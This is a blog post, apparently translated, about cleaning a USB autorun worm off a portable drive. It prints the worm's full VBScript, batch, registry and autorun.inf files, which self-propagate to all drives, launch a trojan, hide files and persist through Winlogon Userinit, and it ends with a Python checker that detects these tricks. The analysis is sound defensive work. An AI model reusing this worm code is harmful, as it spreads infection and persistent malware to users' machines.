    Infected by a virus, learning batch scripting

    Last week my portable hard drive had a problem, so I asked a friend who does electronics to take a look. The drive came back yesterday and works again, thanks!
    But after plugging the drive into my computer, the drive letter could not be opened from "My Computer"; it reported "Cannot find script loveauto.vbs". Seeing a .vbs, my guess was that this guy's machine had a virus which had infected the portable drive. Right-clicking the drive showed an "auto" entry in the menu, which confirmed my suspicion.

    An "auto" menu entry is usually the work of an autorun.inf in the drive root. Since I could not enter the drive through the right-click menu, I took the back door and used cmd.

    In cmd I went to G:\ and ran attrib. Sure enough, there were several loveauto.xxx files, all with the SHR (system, hidden, read-only) attributes. What a lame virus! It can only bully beginners who don't know computers!
    I ran attrib -s -h -r loveauto.xxx, then del loveauto.xxx one by one, unplugged the drive and plugged it back in; the virus was cleaned successfully.

    Looking at it from another angle, viruses that can easily invade a computer and spread freely generally have one thing in common: their batch (or autorun) scripting is done well. Below we look at the code of this virus's files.

    loveauto.vbs
    ---------------
    on error resume next
    Set WshShell =CreateObject("WScript.Shell")
    Set objFSO = CreateObject("Scripting.FileSystemObject")
    set Of = CreateObject("Scripting.FileSystemObject")
    set dir = Of.GetSpecialFolder(1) ' get the special folder dir (1 = the System folder, e.g. C:\Windows\system32)

    if WScript.ScriptFullName="C:\loveauto.vbs" or WScript.ScriptFullName="D:\loveauto.vbs" or WScript.ScriptFullName="E:\loveauto.vbs" or WScript.ScriptFullName="F:\loveauto.vbs" or WScript.ScriptFullName="G:\loveauto.vbs" or WScript.ScriptFullName="H:\loveauto.vbs" or WScript.ScriptFullName="I:\loveauto.vbs" or WScript.ScriptFullName="J:\loveauto.vbs" or WScript.ScriptFullName="K:\loveauto.vbs" or WScript.ScriptFullName="L:\loveauto.vbs" or WScript.ScriptFullName="M:\loveauto.vbs" or WScript.ScriptFullName="N:\loveauto.vbs" or WScript.ScriptFullName="O:\loveauto.vbs" or WScript.ScriptFullName="P:\loveauto.vbs" or WScript.ScriptFullName="Q:\loveauto.vbs" or WScript.ScriptFullName="R:\loveauto.vbs" or WScript.ScriptFullName="S:\loveauto.vbs" or WScript.ScriptFullName="T:\loveauto.vbs" or WScript.ScriptFullName="U:\loveauto.vbs" or WScript.ScriptFullName="V:\loveauto.vbs" or WScript.ScriptFullName="W:\loveauto.vbs" or WScript.ScriptFullName="X:\loveauto.vbs" or WScript.ScriptFullName="Y:\loveauto.vbs" or WScript.ScriptFullName="Z:\loveauto.vbs" then
    a=WshShell.Run("loveauto.bat open" ,0,False)
    a=WshShell.Run("loveauto.bat ++ " ,0,True)


    If objFSO.FileExists(dir&"\loveauto.vbs") Then ' check whether the system is already infected
    wscript.sleep 10
    else
    a=WshShell.Run("loveauto.bat - "&dir ,0,True)
    a=WshShell.Run("loveauto.bat ++ " ,0,True)
    Of.CopyFile "loveauto.bat",dir&"\",True ' if not yet infected, copy the files into the system folder
    Of.CopyFile "limt.exe",dir&"\",True
    Of.CopyFile "autorun.inf",dir&"\",True
    Of.CopyFile "loveauto.reg",dir&"\",True
    Of.CopyFile "loveauto.vbs",dir&"\",True
    a=WshShell.Run("loveauto.bat + "&dir ,0,True)
    a=WshShell.Run("loveauto.bat date " ,0,True) ' change the system date
    WScript.Sleep 15000
    a=WshShell.Run("limt.exe" ,0,False) ' run the trojan
    a=WshShell.Run("loveauto.bat hfd " ,0,False) ' restore the date
    For i=1 to 2
    Set dc = Of.Drives ' get all drives

    For Each d In dc ' loop over all drive letters and copy itself to each
    If d.DriveType = 2 Or d.DriveType = 3 or (d.DriveType = 1 and d<>"A:" and d<> "B:") Then
    a=WshShell.Run("loveauto.bat - "&d ,0,True)
    a=WshShell.Run("loveauto.bat ++ " ,0,True)
    Of.CopyFile dir&"\loveauto.bat",d&"\",True
    Of.CopyFile dir&"\limt.exe",d&"\",True
    Of.CopyFile dir&"\autorun.inf",d&"\",True
    Of.CopyFile dir&"\loveauto.reg",d&"\",True
    Of.CopyFile dir&"\loveauto.vbs",d&"\",True
    a=WshShell.Run("loveauto.bat + "&d ,0,True)
    end if
    wscript.sleep 2000
    next
    wscript.sleep 50000
    i=0
    next
    end if
    else
    If objFSO.FileExists(dir&"\loveauto.vbs") Then
    For i=1 to 2
    Set dc = Of.Drives ' get all drives

    For Each d In dc ' loop over all drive letters and copy itself to each
    If d.DriveType = 2 Or d.DriveType = 3 or (d.DriveType = 1 and d<>"A:" and d<> "B:") Then
    a=WshShell.Run("loveauto.bat - "&d ,0,True)
    a=WshShell.Run("loveauto.bat ++ " ,0,True)
    Of.CopyFile dir&"\loveauto.bat",d&"\",True
    Of.CopyFile dir&"\limt.exe",d&"\",True
    Of.CopyFile dir&"\autorun.inf",d&"\",True
    Of.CopyFile dir&"\loveauto.reg",d&"\",True
    Of.CopyFile dir&"\loveauto.vbs",d&"\",True
    a=WshShell.Run("loveauto.bat + "&d ,0,True)
    end if
    wscript.sleep 2000
    next
    wscript.sleep 50000
    i=0
    next
    else
    a=WshShell.Run("loveauto.bat date " ,0,True) ' change the system date
    WScript.Sleep 15000
    a=WshShell.Run("limt.exe" ,0,False) ' run the trojan
    a=WshShell.Run("loveauto.bat hfd " ,0,False) ' restore the date
    a=WshShell.Run("loveauto.bat - "&dir ,0,True)
    a=WshShell.Run("loveauto.bat ++ " ,0,True)
    Of.CopyFile "loveauto.bat",dir&"\",True ' if not yet infected, copy the files into the system folder
    Of.CopyFile "limt.exe",dir&"\",True
    Of.CopyFile "autorun.inf",dir&"\",True
    Of.CopyFile "loveauto.reg",dir&"\",True
    Of.CopyFile "loveauto.vbs",dir&"\",True
    a=WshShell.Run("loveauto.bat + "&dir ,0,True)
    For i=1 to 2
    Set dc = Of.Drives ' get all drives

    For Each d In dc ' loop over all drive letters and copy itself to each
    If d.DriveType = 2 Or d.DriveType = 3 or (d.DriveType = 1 and d<>"A:" and d<> "B:") Then
    a=WshShell.Run("loveauto.bat - "&d ,0,True)
    a=WshShell.Run("loveauto.bat ++ " ,0,True)
    Of.CopyFile "loveauto.bat",d&"\",True
    Of.CopyFile "limt.exe",d&"\",True
    Of.CopyFile "autorun.inf",d&"\",True
    Of.CopyFile "loveauto.reg",d&"\",True
    Of.CopyFile "loveauto.vbs",d&"\",True
    a=WshShell.Run("loveauto.bat + "&d ,0,True)
    end if
    wscript.sleep 2000
    next
    wscript.sleep 50000
    i=0
    next

    end if

    end if
    ---------------

    loveauto.reg
    ---------------
    Windows Registry Editor Version 5.00

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
    "Userinit"="userinit.exe,loveauto.bat"

    [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
    "ShowSuperHidden"=dword:00000000
    "Hidden"=dword:00000002

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
    "RegPath"="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced"
    "Text"="@shell32.dll,-30500"
    "Type"="radio"
    "CheckedValue"=dword:00000000
    "ValueName"="Hidden"
    "DefaultValue"=dword:00000000
    "HKeyRoot"=dword:80000001
    "HelpID"="shell.hlp#51105"

    ---------------

    loveauto.bat
    ---------------
    @echo off
    if exist .\loveauto.reg regedit /s .\loveauto.reg
    if "%1"=="open" goto open
    if "%1"=="-" goto qu
    if "%1"=="++" goto jiajia
    if "%1"=="+" goto jia
    if "%1"=="date" goto date
    if "%1"=="hfd" goto hfd
    goto start
    :qu
    attrib -s -a -h -r %2\loveauto.bat
    attrib -s -a -h -r %2\loveauto.reg
    attrib -s -a -h -r %2\autorun.inf
    attrib -s -a -h -r %2\loveauto.vbs
    attrib -s -a -h -r %2\limt.exe
    exit
    :jia
    attrib +s +a +h +r %2\loveauto.bat
    attrib +s +a +h +r %2\loveauto.reg
    attrib +s +a +h +r %2\autorun.inf
    attrib +s +a +h +r %2\loveauto.vbs
    attrib +s +a +h +r %2\limt.exe
    exit
    :jiajia
    attrib +s +a +h +r loveauto.bat
    attrib +s +a +h +r loveauto.reg
    attrib +s +a +h +r autorun.inf
    attrib +s +a +h +r loveauto.vbs
    attrib +s +a +h +r limt.exe
    exit
    :open
    start explorer .\
    exit
    :date
    date 1990-01-01

    date 1990-01-01
    exit
    :hfd
    date 2007-05-29
    date %date%
    exit
    :start
    start WScript.exe %SYSTEMROOT%\system32\loveauto.vbs&exit
    :end

    ---------------

    autorun.inf
    ---------------
    [autorun]
    open=WScript.exe loveauto.vbs
    shellEXEcute=WScript.exe loveauto.vbs
    shell\Auto\command=WScript.exe loveauto.vbs
    shell\open=打开(&O)
    shell\open\Command=WScript.exe .\loveauto.vbs
    shell\open\Default=1
    shell\explore=资源管理器(&X)
    shell\explore\Command=WScript.exe .\loveauto.vbs
    ---------------


    The vbs and bat files contain a few batch-scripting tricks that are worth studying.
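    As an added example (not part of the original post), here is a small Python checker that parses the two data files quoted above, autorun.inf and loveauto.reg, and reports the tricks they rely on: the autorun keys that make Explorer run WScript.exe, the Userinit chain that starts loveauto.bat at every logon, and the SHOWALL / ShowSuperHidden changes that keep the SHR files invisible. The embedded samples are excerpted from the post's own files; the function and constant names are my own.

```python
import configparser
import re

AUTORUN_INF = r"""[autorun]
open=WScript.exe loveauto.vbs
shellEXEcute=WScript.exe loveauto.vbs
shell\Auto\command=WScript.exe loveauto.vbs
shell\open\Command=WScript.exe .\loveauto.vbs
shell\explore\Command=WScript.exe .\loveauto.vbs
"""
LOVEAUTO_REG = r"""Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Userinit"="userinit.exe,loveauto.bat"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden"=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
"CheckedValue"=dword:00000000
"""
WINLOGON = r"hkey_local_machine\software\microsoft\windows nt\currentversion\winlogon"
ADVANCED = r"hkey_current_user\software\microsoft\windows\currentversion\explorer\advanced"
SHOWALL = ADVANCED.replace("hkey_current_user", "hkey_local_machine") + r"\folder\hidden\showall"

def autorun_findings(text):
    # configparser lowercases option names, so "shellEXEcute" arrives as "shellexecute".
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    out = []
    for key, value in (cp.items("autorun") if cp.has_section("autorun") else []):
        # open=, shellexecute= and any ...\command= key make Explorer run the value on open/double-click
        if (key in ("open", "shellexecute") or key.endswith("\\command")) and re.search(r"(wscript|cscript|cmd)\.exe|\.(vbs|bat|cmd|js)\b", value, re.I):
            out.append(f"autorun.inf {key} -> {value}")
    return out

def reg_findings(text):
    # Minimal .reg reader: remember the current [key] and map (key, name) -> value text.
    values, key = {}, None
    for line in text.splitlines():
        if m := re.fullmatch(r"\[(.+)\]", line.strip()):
            key = m.group(1).lower()
        elif key and (m := re.fullmatch(r'"([^"]+)"=(.+)', line.strip())):
            values[(key, m.group(1).lower())] = m.group(2).strip('"')
    out = []
    # Userinit is a comma-separated list; anything besides userinit.exe runs at every logon.
    extra = [e.strip() for e in values.get((WINLOGON, "userinit"), "").lower().split(",")
             if e.strip() and not e.strip().endswith("userinit.exe")]
    if extra:
        out.append(f"Userinit chains extra program(s) at logon: {extra}")
    if values.get((SHOWALL, "checkedvalue")) == "dword:00000000":  # the normal value is 1
        out.append("SHOWALL CheckedValue=0: the 'Show hidden files' option no longer takes effect")
    if values.get((ADVANCED, "showsuperhidden")) == "dword:00000000":
        out.append("ShowSuperHidden=0: system+hidden (SHR) files stay invisible in Explorer")
    return out
```

    Point both functions at the files copied off a suspect drive (or exported from a suspect machine) to get the same findings before deciding what to attrib and del.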
    Original URL: https://www.cnblogs.com/longware/p/13382332.html